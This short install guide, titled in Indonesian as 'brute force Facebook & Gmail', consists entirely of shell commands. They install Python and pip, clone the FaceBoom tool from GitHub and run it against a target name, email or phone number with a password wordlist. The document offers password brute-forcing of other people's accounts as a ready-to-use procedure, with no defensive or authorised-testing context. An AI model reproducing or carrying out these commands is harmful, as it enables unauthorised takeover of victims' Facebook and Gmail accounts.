INSTALASI BRUTE FORCE FACEBOOK $ GMAIL

apt install python && apt install python3 && pkg install python && pkg install python3 && apt install python-pip && apt install python3-pip && pkg install python-pip && pkg install python3-pip
apt install python
apt install python3
pkg install python
pkg install python3
apt install python-pip
apt install python3-pip
pkg install python-pip
pkg install python3-pip

pip install mechanize
git clone https://github.com/Oseid/FaceBoom.git
cd FaceBoom/
python3 faceboom.py
python3 faceboom.py -t < name/email/number > -w < wordlist >